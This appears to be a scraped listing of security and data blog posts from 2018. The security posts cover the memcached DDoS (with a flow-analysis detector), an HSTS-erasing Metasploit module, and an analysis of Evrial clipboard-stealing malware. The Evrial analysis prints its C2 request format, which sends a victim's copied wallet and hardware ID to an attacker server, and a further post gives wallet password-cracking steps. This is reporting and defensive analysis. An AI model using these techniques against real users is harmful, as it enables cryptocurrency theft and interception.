#CyberSecurityPulse: Biggest-Ever DDoS Attack Hits GitHub Website

ElevenPaths    6 March, 2018

At the end of 2016, a DDoS attack on DynDNS blocked major Internet sites such as Twitter, Spotify and PayPal. The Mirai botnet was used to take advantage of the full bandwidth of thousands of Internet-connected devices. However, last Wednesday 28th of February we witnessed the largest DDoS attack ever seen on the GitHub website, reaching a record 1.35 Tbps and 126.9 million packets per second.

Interestingly, the attackers did not use any botnets, but misconfigured Memcached servers to amplify the attack. Memcached operation is based on a distributed hash table. To prevent misuse of Memcached servers, administrators should consider firewalling, blocking or rate-limiting UDP on source port 11211 or completely disable UDP support if not in use. In this sense, Akamai estimates that at least 50,000 servers are vulnerable.
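The filtering advice above can be checked against flow data. The following Python sketch is an added example, not part of the original post: it flags hosts receiving UDP traffic with source port 11211 from several external senders, and hosts in your own range that are emitting such traffic. The flow records are constructed; treating 192.0.2.0/24 as "our" network and the two thresholds are assumptions.

```python
import ipaddress
from collections import defaultdict

MEMCACHED_PORT = 11211
# Assumption: 192.0.2.0/24 stands in for the defender's own address space.
OUR_NETS = [ipaddress.ip_network("192.0.2.0/24")]

# Constructed flow records: src_ip,src_port,dst_ip,dst_port,proto,bytes
SAMPLE_FLOWS = """\
198.51.100.10,11211,192.0.2.80,41522,udp,1400000
198.51.100.11,11211,192.0.2.80,41522,udp,1350000
203.0.113.7,11211,192.0.2.80,9031,udp,1420000
203.0.113.9,53,192.0.2.80,5353,udp,300
192.0.2.25,11211,203.0.113.200,80,udp,980000
192.0.2.30,11211,192.0.2.31,50000,udp,1200
192.0.2.40,51000,192.0.2.30,11211,tcp,900
"""


def is_ours(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in OUR_NETS)


def parse_flows(text):
    """Yield (src, sport, dst, dport, proto, bytes), skipping malformed lines."""
    for line in text.splitlines():
        parts = [p.strip() for p in line.split(",")]
        if len(parts) != 6:
            continue
        try:
            ipaddress.ip_address(parts[0])
            ipaddress.ip_address(parts[2])
            yield (parts[0], int(parts[1]), parts[2], int(parts[3]),
                   parts[4].lower(), int(parts[5]))
        except ValueError:
            continue


def analyse(text, min_sources=3, min_bytes=1_000_000):
    """Return (flooded, emitting) for UDP flows whose source port is 11211."""
    inbound = defaultdict(lambda: {"sources": set(), "bytes": 0})
    emitting = defaultdict(int)
    for src, sport, dst, _dport, proto, nbytes in parse_flows(text):
        # Reflected memcached replies are UDP with *source* port 11211.
        if proto != "udp" or sport != MEMCACHED_PORT:
            continue
        if is_ours(dst) and not is_ours(src):
            # External senders replying to one of our hosts.
            inbound[dst]["sources"].add(src)
            inbound[dst]["bytes"] += nbytes
        elif is_ours(src) and not is_ours(dst):
            # One of our hosts answering memcached over UDP to the outside.
            emitting[src] += nbytes
    flooded = {
        dst: (len(v["sources"]), v["bytes"])
        for dst, v in inbound.items()
        if len(v["sources"]) >= min_sources and v["bytes"] >= min_bytes
    }
    return flooded, dict(emitting)


if __name__ == "__main__":
    flooded, emitting = analyse(SAMPLE_FLOWS)
    for host, (count, total) in flooded.items():
        print(f"{host}: {total} bytes from {count} senders with UDP source port 11211")
    for host, total in emitting.items():
        print(f"{host}: sent {total} bytes from UDP/11211 to external hosts; "
              "filter or disable UDP on this server")
```

Internal-to-internal traffic and TCP connections to port 11211 are ignored on purpose, since the advice concerns UDP replies crossing the network boundary.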


In fact, Arbor confirmed this week a new attack with similar characteristics to the one perpetrated against GitHub, reaching 1.7 Terabits, 0.4 higher than last week. Although it has not disclosed the name of the protected client, the company has indicated that it is a corporation based in the United States, which suffered from the same amplification vector as in previous days, relying on memcached servers.

More information at GitHub

Top Stories

More Than $2 Million Worth of Bitcoin Mining Equipment Stolen in Iceland

The thieves stole a large amount of equipment, including 600 graphics cards, 100 processors and 100 motherboards, as well as other mining hardware, as recorded by the security cameras of Advania, one of the companies affected by two incidents in the last months. Iceland has become an interesting country for those engaged in cryptocurrency mining, considering that renewable energy, which represents almost 100% of the energy generated in the country, is cheap and affordable. Police are trying to track down the thieves by paying special attention to any spike in energy consumption around the country, in an investigation that remains open despite the first arrests having already taken place.

More information at The Hacker News

German Government’s Stolen After Computer Infiltration

In December 2017 the German government identified a serious intrusion into systems and networks linked to its government. Spokesman Johannes Dimroth has confirmed this, adding that it is being treated as a high-priority incident. Other sources say that the infection could have been active for a year. The German Ministry of Interior has identified the culprits as being linked to APT28 (also known as Fancy Bears), a group allegedly linked to Russia after taking part in incidents such as the security breach of the Democratic Party prior to the last US presidential elections or the French elections held in 2017.

More information at Reuters

Rest of the Week’s News

Coinbase Will Send Data on 13,000 Users to IRS

Coinbase has now formally notified its customers that it will be complying with a court order and handing over the user data for about 13,000 of its customers to the Internal Revenue Service. The company, which is one of the world’s largest Bitcoin exchanges, sent out an email to the affected users on Friday, February 23. The case began back in November 2016 when the IRS went to a federal judge in San Francisco to enforce an initial order that would have required the company to hand over the data of all users who transacted on the site between 2013 and 2015 as part of a tax evasion investigation.

More information at Coinbase

US Intel Says Russia Launched False Flag Olympics Cyberattack

Russian military spies hacked several hundred computers used by authorities at the 2018 Winter Olympic Games in South Korea, according to U.S. intelligence. They did so while trying to make it appear as though the intrusion was conducted by North Korea, what is known as a false-flag operation, said two U.S. officials last week who spoke on the condition of anonymity to discuss a sensitive matter.

More information at Washington Post

A Simple Bug Revealed Admins of Facebook Pages

Egyptian security researcher Mohamed A. Baset has discovered a severe information disclosure vulnerability in Facebook that could have allowed anyone to expose Facebook page administrator profiles, which is otherwise not supposed to be public information. Baset said he found the vulnerability, which he described as a “logical error,” after receiving an invitation to like a particular Facebook page on which he had previously liked a post.

More information at Seekurity

Further Reading

UK Think Tanks Hacked By Groups in China

More information at BBC

Hacker Returns 20,000 ETH Stolen During CoinDash ICO

More information at ZDNet

New Attacks on 4G LTE Networks Can Allow to Spy on Users and Spoof Emergency Alerts

More information at Security Affairs

New tool: “Web browsers HSTS entries eraser”, our Metasploit post exploitation module

ElevenPaths    5 March, 2018
This module deletes the HSTS/HPKP database of the main browsers: Chrome, Firefox, Opera, Safari and wget in Windows, Mac and Linux. This allows an attacker to perform man-in-the-middle attacks once a target has been compromised. It is available as a post-exploitation module in the Metasploit project.

Over the last few years we have been researching HSTS and HPKP: how they work on the server side, how they are implemented, how administrators deal with them and how browsers implement these mechanisms. We have even created tools and a test web page around them. Now we add to our toolset a new script, which has become a post-exploitation Metasploit module.


During RootedCON (where we showed an improved version of our Black Hat presentation) we revealed that our post-exploitation module to erase HSTS/HPKP entries in the main web browsers (coded by Sheila Berta, one of our researchers in Innovation and Laboratory at ElevenPaths) has recently been merged into the official Metasploit repository.

Using it is quite simple, as shown in this video.

Hope you find it useful.

Innovation and laboratory

And the Oscar goes to… Data!

AI of Things    2 March, 2018
This weekend, the 90th Academy Awards will take place at the Dolby Theatre in Hollywood. More commonly known as the Oscars, these awards are the ultimate celebration of the best films of the previous year and yearly ranks as the most viewed awards show by number of viewers. Last year, over 34 million people tuned in (in the US alone) to watch Leonardo DiCaprio finally receive his first Best Actor Oscar and La La Land to incorrectly be announced as the winner of Best Film (before the prize was correctly handed over to Moonlight). Each year, plenty of “experts” try to predict the winners, but in this post, we will see how Big Data can be used to make predictions that are more accurate.

Using data to predict events has been going on for years, but saw a particular explosion of popularity when Nate Silver, an American statistician, correctly predicted 49 out of 50 states in the 2008 US Elections (he went one further in 2012 and predicted all 50). Silver’s own company FiveThirtyEight have been making predictions on the Oscars for many years. As we will see in this blog, there are a number of ways of predicting how the 7,258 odd Oscars votes will be cast, but FiveThirtyEight base their model on wins at previous awards (such as the BAFTAS).

As is explained in more detail in this article by the company themselves, a numerical score can be given to each award based on how often an individual or film has won that award as well as an Oscar. For example, the same Supporting Actor has won the Golden Globe and the Academy Award in 17 of the last 25 years (68% of the time). The fraction of 0.68 is squared to 0.46 and then multiplied to get a point score of 46. FiveThirtyEight predict Gary Oldman (The Darkest Hour), Frances McDormand (Three Billboards Outside Ebbing, Missouri) Allison Janney (I, Tonya) and Sam Rockwell (Three Billboards) to continue their winning streaks and The Shape of Water to win best picture. You can see the full details of the prediction here.

Figure 2: Studies estimate that film studios spend up to $10m to help their film win an Oscar.
Moving back to 2015, let’s look at the methods of Ben Zauzmer, a Harvard student, which helped him predict 86% of all winners (including a 100% success in predicting the big four acting awards, best film and best director). According to Zauzmer himself, his models are based on “thousands of data points on Oscar ceremonies over the past two decades”. This is a perfect example of Big Data analysis, which has the ability to draw out trends and “Insights” which would be hard to see with human analysis.

Other companies have taken a more behavioral approach to making predictions. For three consecutive years (2013 to 2015), digital advertising firm Exponential successfully predicted the recipient of the Best Picture award. In 2016, the award was hotly contested, with experts divided between Spotlight (the eventual winner), The Big Short and The Revenant. Exponential used big data, which included 10,116 different behavioral indicators, to correctly predict the winner for the fourth year running.

Figure 3: Recent analysis has combined raw data with sentiment analysis (how movies make people feel).

A similar analysis was done by tech firms Cognizant and Clarabridge, whose sentiment analysis involved studying (among 150 different variables) 150,000 text reviews and 38 million star ratings on IMDB. Their algorithms (which use artificial intelligence and machine learning) can detect strong emotions such as anger, which (perhaps surprisingly) are good indicators of success. A good film will take its viewers on an emotional journey after all! Both of these companies predicted that The Revenant would win that year, which perhaps shows that pure data methods such as those used by FiveThirtyEight are more accurate.

As we have seen in these examples, Big Data analytics can be applied to much more than the world of business, and the Insights it produces can be incredibly accurate. We’ll have to wait and see if FiveThirtyEight’s predictions for this year are correct, but for now follow us on Twitter, LinkedIn and YouTube to keep up to date with all things LUCA.

An IoT that deserves an Oscar

Beatriz Sanz Baños    1 March, 2018

Connectivity has reached the film industry. The use of drones, virtual reality or beacon technology offers spectators the possibility of enjoying a much more complete audiovisual experience.

Big Data and the Blockchain phenomenon: Part II

AI of Things    28 February, 2018
Welcome back to the second half of this mini-series about the technological phenomenon that is blockchain. In my previous post, we looked at how the technology works and some of its key benefits. If you haven’t yet had a chance to read it, we recommend you do so before continuing. Today, we widen the net to look beyond cryptocurrencies and will see a variety of sectors that are adopting blockchain technology. Also, since our passion is Big Data, we will see how Big Data analytics can take blockchain even further. Shall we get started?
 

What can Big Data bring to the table?

 
As we saw previously, blockchain is a technology with which data can be stored across a “peer-to-peer” network. Each “block” contains a piece of information (e.g. a financial transfer or sales figures) and once verified by each party in the network, it can be added to the existing chain. As you can probably imagine, blockchains can become extremely long, containing huge amounts of information. Given the progress we are seeing in areas such as the Internet of Things (IoT), data quantities will continue growing at an exponential rate. To give you a bit of perspective, it is predicted that there will be 21 billion connected devices by 2020!

 

Figure 1: Amazon are one of a number of companies creating connected devices.
     
All of this presents both a challenge and an opportunity. For companies in any sector, more data is likely to mean a greater understanding of customers, suppliers and their own business. However, simply having the data is not enough; it must be processed and analyzed in order to extract value. This is where Big Data analytics, such as those we use at LUCA, enter the picture. Such analytics make it possible to identify patterns in the data, and the fact that blockchains contain all historical data means that these “insights” can be extracted with greater precision. Another benefit of Big Data analysis is in the detection of fraudulent transactions; it is able to detect when a new entry to the blockchain is anomalous and likely to be invalid.
 
Essentially, the two technologies can go hand in hand, with blockchain allowing data to be stored in a transparent and secure way and big data analytics then extracting valuable insights from this information. This partnership has incredible potential value – it has been estimated that “the blockchain ledger could be worth up to 20% of the total big data market by 2030, producing up to $100 billion in annual revenue.”
 

Who can benefit from blockchain?

 
As mentioned in the first part of this mini-series, cryptocurrencies (such as Bitcoin and Ethereum) were the early adopters of blockchain technology and they often receive the most attention. However, an increasing number of industries are moving into the blockchain space for fear of missing out. Here are five interesting examples:
  • Healthcare – 2017 saw an unprecedented rise in healthcare cyber-attacks, including ones targeting the NHS in the UK and a variety of providers in the US. In the healthcare sector, due to the delicate nature of information, good management of patient data is paramount. Mismanagement can lead to misdiagnosis since different “touchpoints” may end up having differing patient records. Blockchain, as we saw previously, involves a “distributed ledger” which means that each touchpoint (GP, A+E etc) would have an up-to-date copy of patient information. This not only improves accuracy of information but can reduce the risk of hacks too, since each node in the peer-to-peer network must validate any change to the blockchain.
 
  • Governments – High profile claims of voter fraud have plagued elections in recent times. For example, Donald Trump said (without evidence) that between 3 and 5 million people cost him the popular vote in the 2016 elections by voting illegally. The traditional system of manually counting votes seems to have had its day. With blockchain technology, identity can be verified at the point of registration and voting could be done electronically. In this way, there would be a public ledger of all recorded votes and fraudulent votes would be removed. Check out Follow My Vote to see an example of how this could work. Governments can also be slow, opaque and full of bureaucracy, and blockchain-based systems could make them transparent to the public and increase trust. Dubai plans to put all government documents on the blockchain by 2020.
 
Figure 2: Physical polling stations may be replaced by online voting systems based on blockchains.
 
    
  • Design – One of the issues facing graphic designers and other content creators is the large amount of processing power that is required to work on, render and export their creation. The startup Golem describes themselves as a “decentralized supercomputer“, and their service involves the sharing of spare computing resources. Suppliers install a plugin which analyzes how much spare capacity (in terms of processing etc) they are running with and then offers this excess to those who need it. The plugin is non-intrusive and is currently applied to CGI rendering with future applications that will include Machine Learning and more.
 
  • Real Estate – Buying and selling houses often involves a very slow process full of unexpected additional fees. A system based on blockchains would significantly speed up the process since it would remove the need for paper-based records. Fees would also be reduced since blockchains reduce the need for third parties. Ubitquity is an example of a company working in this area.
 
  • Charity – In this area, the greatest complaint is that inefficiencies and corruption exist, which means that your donations don’t reach those that need them most. For example, text-based donations can occasionally take a small percentage of the donation to pay for the service. Since blockchain technology is fully end-to-end, donors would be able to fully trace where their money goes. Companies such as the BitGive Foundation are using Bitcoin to do this.

These five examples are just a snapshot of the bigger picture; for a more comprehensive list of industries adopting blockchain, check out this YouTube video and this infographic. What do you think will happen in the coming months and years? Is your industry adopting blockchain yet? To keep up to date with all things LUCA and Big Data, don’t forget to follow us on Twitter, LinkedIn and YouTube.

 

Evrial, malware that steals Bitcoins using the clipboard… and the scammed scammers

ElevenPaths    26 February, 2018
Evrial is the latest cryptocoin-stealing malware, and uses its control of the clipboard as its strongest bet to get “easy money”. ElevenPaths has taken a deep technical dive into the malware itself to show how it works, with a quite self-explanatory video. In addition, we have followed the steps of its Russian creator and found that whoever he is… he scammed the scammers themselves.

Qutra, the creator, selling its malware


In the beginning, at the end of 2017, we had Cryptoshuffle. It was malware able to hijack the clipboard and modify the cryptocoin address in it. A bit later, someone saw some business in it and started to sell the platform itself, calling it “Evrial”. That was around the beginning of 2018, when Cryptoshuffle started to “disappear” and Evrial saw the light. It was a .NET malware able to steal passwords from browsers, FTP clients and Pidgin and, the best part, able to modify the clipboard on the fly and change any cryptocurrency address to whatever address you wanted. To do so, the malware checks the format of whatever is in the clipboard. If the victim copies, for example, a Bitcoin or Litecoin address, it is quickly replaced by another, on the fly and dynamically (the new address is requested from a server).

Taking the address from a server and setting the clipboard

Evrial allows the attacker to control it all from a comfortable panel where the stolen data is available. When the attacker buys the application, he can set his “name” for logging into the panel (that will be hardcoded in the code, so the Evrial version is unique for him).

Control panel used by the attacker to advertise the malware and by the buyers to administrate their “loot”

For example, on an infected computer, every time a wallet address is copied into the clipboard, a request is made to a specific server owned by the attacker. This is the format:

[C2domain.com]/shuffler.php?type=BTC&user=ATTACKER&copy=[WhateverWalletIsCopiedInTheClipboard]&hwid=[UniqueNumberForTheVictim]

Where “type” may be BTC, LTC, ETH, XMR, WMR, WMZ or Steam. The server will respond with an address.
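The request format above is distinctive enough to search for in web proxy logs. The following Python sketch is an added example, not code from the original analysis: it matches URLs that fit the shuffler.php format and groups the hits by client. The log layout, host names, user tags and wallet strings are constructed placeholders, not real indicators.

```python
from urllib.parse import urlsplit, parse_qs

# Values of "type" listed in the article (compared case-insensitively).
KNOWN_TYPES = {"BTC", "LTC", "ETH", "XMR", "WMR", "WMZ", "STEAM"}
REQUIRED_PARAMS = ("type", "user", "copy", "hwid")

# Constructed proxy log lines: timestamp, client IP, method, URL.
SAMPLE_LOG = """\
2018-02-26T10:01:02Z 10.0.0.5 GET http://c2.example.invalid/shuffler.php?type=BTC&user=buyer1&copy=CONSTRUCTED_BTC_ADDR&hwid=HW-0001
2018-02-26T10:01:09Z 10.0.0.5 GET http://c2.example.invalid/shuffler.php?type=Steam&user=buyer1&copy=CONSTRUCTED_STEAM_LINK&hwid=HW-0001
2018-02-26T10:02:00Z 10.0.0.9 GET http://music.example.invalid/shuffler.php?mode=random
2018-02-26T10:03:30Z 10.0.0.7 GET http://shop.example.invalid/cart.php?type=BTC&user=alice
2018-02-26T10:04:11Z 10.0.0.8 GET http://other.example.invalid/a/shuffler.php?hwid=HW-0002&copy=CONSTRUCTED_LTC_ADDR&user=buyer2&type=ltc
"""


def match_request(url):
    """Return the fields of a shuffler.php lookup, or None if the URL does not fit."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/shuffler.php"):
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    # All four parameters must be present, in any order.
    if any(name not in query for name in REQUIRED_PARAMS):
        return None
    coin = query["type"][0].upper()
    if coin not in KNOWN_TYPES:
        return None
    # The copied clipboard value is deliberately not kept in the result.
    return {
        "host": parts.hostname,
        "type": coin,
        "user": query["user"][0],
        "hwid": query["hwid"][0],
    }


def scan(log_text):
    """Group matching requests by client IP."""
    hits = {}
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue
        _timestamp, client, _method, url = fields
        found = match_request(url)
        if found:
            hits.setdefault(client, []).append(found)
    return hits


if __name__ == "__main__":
    for client, found in scan(SAMPLE_LOG).items():
        for hit in found:
            print(f"{client} -> {hit['host']} type={hit['type']} "
                  f"user={hit['user']} hwid={hit['hwid']}")
```

Matching on the path and parameter set rather than on a domain keeps the check useful when the C&C domain changes.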

What is it useful for?

When you want to make, let’s say, a Bitcoin transfer, you usually copy and paste the destination address… If it is switched “on the fly”, the attacker expects that the user, unwittingly and trusting the clipboard, will confirm the transaction, which now goes to the attacker’s wallet. That is the trick.

This is a video that shows how it works.

And this is it again with some technical details.

Some curious things

We have found several versions of the malware. All of them are disguised as a process whose description imitates a different process.

567.exe is the process monitoring the clipboard

It runs every time the computer starts up (hidden in a registry call to %appdata%). It is written in .NET; some versions are “shielded” so they are harder to analyze, but others are not. The C&C domain is retrieved from a location on GitHub every time it runs.

This is the main domain for the malware right now

If you copy the same address the server returns to the clipboard… (so the attacker one) it just deletes your clipboard

Who is behind Evrial?

The author himself exposes his Telegram username: @Qutrachka. The account appears in the source code so that he can be contacted. Using this information and some other analysed samples, it has been possible to identify users in different deep web forums under the name Qutra whose main objective is to sell this malicious software.

In the links above there is also evidence that the CryptoSuffer malware is linked to the same threat actor: a publication on Pastebin explaining the functionalities of this family was published under the same user.

Some days after trying to sell it from some of those forums, the user Qutrachka has been banned. Why?

The user Qutra banned from the forum he used to try to sell the malware

The scammed scammers?

The “user” field in the requests is quite interesting. We have found several different names in the several samples we have analyzed:

Itakeda, Plaka, depr103, onfrich, fr3d, ogus, xandrum, danildh, crypto368, knoxvile, hyipblock, fast63, spysdar, zheska, medols1, raff, desusenpai…

It is not hard to find that these nicknames also belong to users of Bitcoin-related websites or Steam forums (remember that Evrial steals payments on this platform too).

Nicknames of users found to be in the “user” field in the malware forum (so, potential buyers) are also easy to find in Bitcoin- and Steam-related forums

Supposedly, people who bought the malware from Qutrachka received a compiled version exclusively for them, with their names hardcoded. So the “scammers” should just set the cryptocoin address that the server returns to their own, and start getting some revenue from buying the program… That is how it should be, right? But this is not the case. Remember this URL?

[C2domain.com]/shuffler.php?type=BTC&user=ATTACKERBUYER&copy=[WhateverWalletIsCopiedInTheClipboard]&hwid=[UniqueNumberForTheVictim]

The problem is that, right now, whatever “user” you insert, the returned address is always the same… the one belonging to Qutrachka, the original one from the earlier versions of the malware. So our theory is that Qutrachka simply changed the server so that, for every request made, the address the C&C returns is his own… So, maybe, he has scammed the scammers.

How much has he made so far?

What we have done as well is modify the header so we get all the accounts from different cryptocurrencies.

[C2domain.com]/shuffler.php?type=BTC&user=ATTACKER&copy=[WhateverWalletIsCopiedInTheClipboard]&hwid=[UniqueNumberForTheVictim]

We requested different “types” changing it to BTC, LTC, ETH, XMR, WMR, WMZ or Steam. These are the results:

  • LTC: LiHcBT4ag4wGi4fDt5ScXuxvjKTcp9TeG2
  • BTC: 12MEp1W6EBdUEcmbhg4qJfaTB5bCNPtLHh
  • ETH: EO0x79ee1da747057c221680f94b7982ba4f3f05b822
  • XMR:4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nU  MXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQp4nTDUPjYLQJVQKcA
  • WMR: R262605493266
  • WMZ: Z924876540636

And now we are able to estimate how much is in each wallet. He has received a total of 21 transactions into the Bitcoin wallet, supposedly from his victims, collecting approximately 0.122 BTC. While the wallets of ransomware attackers usually receive the same amount from each victim, here of course the range is wider and the payments are all different.

Bitcoins earned as of the end of February

The attacker has moved all the money to several addresses to try to blur the trail of his payments. The attacker has received 0.0131 Litecoins as well, and that amount is still available in his wallet. On the other hand, it has not been possible to track payments related to his Monero account, nor to determine whether he has received money in his various Webmoney accounts (WMR and WMZ). We do not know about the Ethereum account either.

Innovation and laboratory

Miguel Ángel de Castro Simón
Senior Cybersecurity Analyst at ElevenPaths

One day Artificial Intelligence could save your life

AI of Things    21 February, 2018
Intensive Care Units… a place where decisions have to be instant and accurate. Any error can result in a loss of life. That’s why Clew Medical have been conducting research and testing in this field, with the aim of optimizing decisions through the power of Data and Artificial Intelligence. In 2014 the value of AI in medicine was found to be $600 million and by 2021 this figure is expected to rise to $6.6 billion.

Clew Medical is a company that develops and produces programs that harness the power of Artificial Intelligence in order to identify ‘high-risk’ patients at Intensive Care Units (ICUs). The idea behind this is to intervene as early as possible and to give patients the highest chance of survival and ultimately recovery possible. Currently, doctors often rely on visual signs and frequently at this stage it is already too late to take action. This system of ‘evidence-based medicine’ is extremely effective in general; however, in times where urgent and instant care is required, it does not function as effectively as possible and can lead to loss of life that would have otherwise been preventable.
The Artificial Intelligence technology has the capability to warn and advise doctors significantly before there is a need for urgent care. The software does so by connecting to the central ICU systems and therefore it has access to hundreds of metrics such as blood pressure, heart rate etc., and these variables refresh every few seconds. The information is then crossed with data from individual patient records and abnormalities are highlighted instantaneously… significantly faster than humanly possible.
Clew Medical also take advantage of the cloud by comparing patient situations with similar historical cases. All previous data is stored in the cloud, both successful cases and errors. This allows for successful methods to be repeated and errors to be ironed out of the system, especially if it is adopted in more Intensive Care Units across the world. Currently, the system is in place in only a handful of hospitals across Israel and the United States.

Ultimately the system will improve quality of care and at the same time reduce the workload on heavily overworked doctors and nurses. It will allow them to optimize their time planning and resource management as the software will be able to identify the patients who require the most attention. When a patient is in a fully stable condition, they will not require around-the-clock care and attention whereas previously with a standard evidence-based model, time would have been lost here.
Figure 2: Blood pressure along with heart rate is monitored continuously
At this stage, the company has had a 99% focus on the ICU area of medicine, as they believe that this area will benefit the most from the groundbreaking technology. However, in the future, once the software has proven its worth and been further developed, there is nothing stopping it from being introduced to the rest of the medical field and reducing stress on all hospital workers.
There are many fears in the modern era that the force that is Artificial Intelligence and robots will take over human jobs in the near future. However, this example shows how this innovative technology can in fact aid doctors to improve the quality of care for those in greatest need. Here at LUCA, we believe in the potential of data and Artificial Intelligence in creating a better world for all.

#CyberSecurityPulse: Dude, Where Are My Bitcoins?

ElevenPaths    20 February, 2018

Numerous types of attacks are affecting cryptocurrency users: families of malware that steal wallets, phishing attacks that try to forge platforms where users manage their bitcoins, applications that use the CPU of users to mine… In addition, those who prefer to manage their own money without delegating responsibility to a third party also have to deal with the problem of losing private keys or not remembering the password that protects the wallet.

If this has happened to you and you protected your wallet with a password, all may not be lost. John the Ripper, a password cracking software tool, contains plugins that crack different wallets: bitcoin2john, blockchain2john, electrum2john, ethereum2john and multibit2john. First, select the plugin to use depending on the type of wallet that you are using. Then pass that content to a text file, launch John the Ripper (./john) with the file name and, finally, cross your fingers!


According to a study conducted by The Genesis Block in 2016, 35% of the bitcoins existing at that time had not been used in transactions since 2011. According to them, the majority could correspond to lost bitcoins. Without a doubt, Bitcoin has left behind many people who could have been billionaires but carelessly lost their money.

Top Stories

Water Utility in Europe Hit by Cryptocurrency Malware Mining Attack

Security firm Radiflow discovered cryptocurrency mining malware in the network of a water utility provider in Europe. The attack is the first public discovery of an unauthorized cryptocurrency miner impacting industrial control systems (ICS) or SCADA (supervisory control and data acquisition) servers. Kfir, CTO at Radiflow, explained that Radiflow is still in the early stages of the investigation, but so far has been able to determine that the cryptocurrency mining software was on the water utility’s network for approximately three weeks before it was detected.

More information at Eweek

Olympic Destroyer Takes Aim At Winter Olympics

On Sunday 11th February, Olympic Games officials confirmed that a cyberattack had occurred but did not comment or speculate further. The samples identified, however, are not from adversaries looking for information from the games; instead, they are aimed at disrupting the games. The samples analysed appear to perform only destructive functionality. There does not appear to be any exfiltration of data. The destructive nature of this malware aims to render the machine unusable by deleting shadow copies and event logs, and by trying to use PsExec and WMI to move further through the environment.

More information at Talos Intelligence

Rest of the Week’s News

Grammarly Patches Chrome Extension Bug That Exposed Users’ Docs

Grammarly has fixed a bug with its Chrome browser extension that exposed its authorization tokens to websites, allowing sites to assume the identity of a user and view their account’s documents. “I’m calling this a high severity bug, because it seems like a pretty severe violation of user expectations,” said Tavis Ormandy, a researcher at Google’s Project Zero, in a Feb. 2 forum post. “Users would not expect that visiting a website gives it permission to access documents or data they’ve typed into other websites.”

More information at Threat Post

Hackers Exploit Telegram Messenger Zero-Day Flaw to Spread Malware

A zero-day vulnerability has been discovered in the desktop version of the end-to-end encrypted Telegram messaging app that was being exploited in the wild in order to spread malware that mines cryptocurrencies such as Monero and ZCash. The flaw has actively been exploited in the wild since at least March 2017 by attackers who tricked victims into downloading malicious software onto their PCs that used their CPU power to mine cryptocurrencies or serve as a backdoor for attackers to remotely control the affected machine.

More information at Securelist

Hackers Exploiting Bitmessage Zero-Day to Steal Bitcoin Wallet Keys

Bitmessage developers have warned of a critical ‘remotely executable’ zero-day vulnerability in the PyBitmessage application that was being exploited in the wild. According to Bitmessage developers, it affects PyBitmessage version 0.6.2 for Linux, Mac, and Windows and has been exploited against some of their users. “The exploit is triggered by a malicious message if you are the recipient (including joined chans). The attacker ran an automated script but also opened, or tried to open, a remote reverse shell,” Bitmessage core developer Peter Šurda explained in a Reddit thread.

More information at Bitmessage

Further Reading

An APFS Filesystem Flaw Could Lead to MacOS Losing Data Under Certain Conditions

More information at Bombich Software

JenkinsMiner Made $3.4 Million in a Few Months by Compromising Jenkins Servers

More information at CheckPoint

Coinhoarder Criminal Gang Made an Estimated $50 Million With a Bitcoin Phishing Campaign

More information at Cyberpolice Ukraine

Elena Gil, CEO of LUCA speaks to us about the potential of Big Data in business

AI of Things    16 February, 2018
“We are just beginning to see the opportunities that Big Data represents”
The importance of data when making any decision is growing. Elena Gil, CEO at LUCA, Telefonica’s data unit, spoke to us on this occasion about the inherent opportunities of Big Data, which has also seen new professions and the development of specific skills that, to this day, are hard to find.

The term Big Data has gained relevance in recent years and today there are few people who have not heard of it. Data analysis helps to predict consumer demands, forecasting their desires and anticipating their actions. For example, some consultants or advisors are sure that, in the short run, the process of buying will not be generic but instead personalized for each user. A key factor in businesses’ competitiveness is that they rely on Big Data to position their products and services in the most efficient and profitable way.

Data has become a fundamental asset and, despite the fact that few invest in it, the percentage of those who plan to do so in the near future is significant.

It’s a future where STEM studies (Science, Technology, Engineering and Mathematics) will become the most demanded in a market that has found a trustworthy niche in technology to exploit, with its most stable backing in Big Data. In fact, currently, it is hard to find profiles experienced in Big Data that undeniably will be essential in the work environment in the short and mid-term.

We now have a data universe that has filtered into almost every aspect of life and that has a greater presence than what society imagines. Therefore, security has become a critical area, where evidence is vital to avoid greater evils. In fact, there are consultants that claim that in the short and mid-term, virtual viruses may cause real illnesses in the future through the vulnerability of advanced data systems.

Data, data and more data that needs adequate processing to extract the maximum value to fit it to people and their needs.
Under the flag of data analysis LUCA was born: Telefonica's Big Data unit, which has recently celebrated its first anniversary. A good part of the credit for the development and consolidation of LUCA goes to its CEO, Elena Gil. Also the global director of Big Data B2B at Telefonica, she has been with the unit since its birth and will be in the future as well, with the company defining itself as one of the largest data investors. Additionally, Elena is a great driving force for the presence of women in STEM and her journey is a great example of that. After graduating in Economics and business management, she obtained an MBA from MIT, demonstrating from the very beginning an interest in the technological world.

The current and future development of Big Data, its opportunities and the reality that the sector is experiencing are the key points in this interview between BlogThinkBig.com and the data expert from LUCA.

Complementarity as the key to success

Elena Gil begins by recalling that the pioneering sectors in the world of Big Data have been those that were and are more “intensive in the generation of data”. But the present and future of the sector are wider than you could think, and its development reaches from financial entities, telecommunications or healthcare to other areas such as transport, energy and industry. The CEO of LUCA understands that in general, any company can utilize Big Data, “above all, hand in hand with the development of Internet of Things (IoT)”.

“The connection of devices will allow the transformation of many sectors”, assured the director of Telefonica’s data unit, which trusts in the complementarity and coordination of different technologies as a bet for the future. Artificial Intelligence, Internet of Things, Cloud, etc. are technologies that “complement and strengthen each other”, and where “Big Data is critical for their development”.

Figure 2: Elena tells us how “the connection of devices will allow the transformation of many sectors”.

Security, Privacy, a constant challenge

A connected industry with a universal goal: security. In fact, as Elena Gil explains, this is a “critical” and essential theme, and aligning a company’s strategy with security has become an essential question in dealing with attacks and breaches.

In this area, in spring this year a new law known as GDPR (General Data Protection Regulation) will be implemented throughout Europe to regulate organizations’ adaptation and correct use of data. “It will be a challenge for companies because we have to adapt, but also it protects the interests of the final users”, claims Elena Gil, who additionally highlights the alignment of Telefonica with the principles of transparency, promise and integrity that GDPR will represent.

The European project develops in parallel with the White Papers on artificial intelligence that will also be presented this spring. This initiative, driven by the Secretary of State for Information and Digital Agenda, consists of a group of multidisciplinary experts involved in its structuring: nine experts from the academic, business and institutional worlds, among them Elena Gil (Telefonica), Elena Alfaro (BBVA), Lorena Jaume-Palasí (University of Berlin and Algorithm Watch) and Miguel Luengo-Oroz (United Nations, UN Global Pulse).
